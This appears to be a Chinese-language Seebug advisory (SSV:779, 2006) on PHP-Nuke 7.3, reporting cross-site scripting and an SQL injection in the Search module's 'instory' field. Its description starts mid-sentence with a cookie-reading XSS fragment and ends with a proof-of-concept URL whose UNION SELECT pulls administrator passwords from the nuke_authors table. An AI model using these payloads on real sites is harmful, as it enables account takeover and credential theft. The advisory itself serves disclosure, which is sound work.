PHPNuke多个SQL注入及跨站脚本漏洞

2006-12-10T00:00:00
ID SSV:779
Type seebug
Reporter Root
Modified 2006-12-10T00:00:00

Description

1"><body onload="alert(document.cookie);当浏览器时,可导致敏感信息泄露。2、SQL注入漏洞"/modules/Search/index.php"中,由于对"instory"字段缺少充分过滤,提交恶意SQL命令,可更改原有SQL逻辑,导致修改数据库或获得敏感信息。

Francisco Burzi PHP-Nuke 7.3 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:<a href="http://www.phpnuke.org" target="_blank">http://www.phpnuke.org</a>

                                        
                                            
                                                Janek Vind (come2waraxe@yahoo.com)提供了如下测试方法:

http://localhost/nuke73/modules.php?name=Search&amp;type=comments&amp;query=not123exists&amp;instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors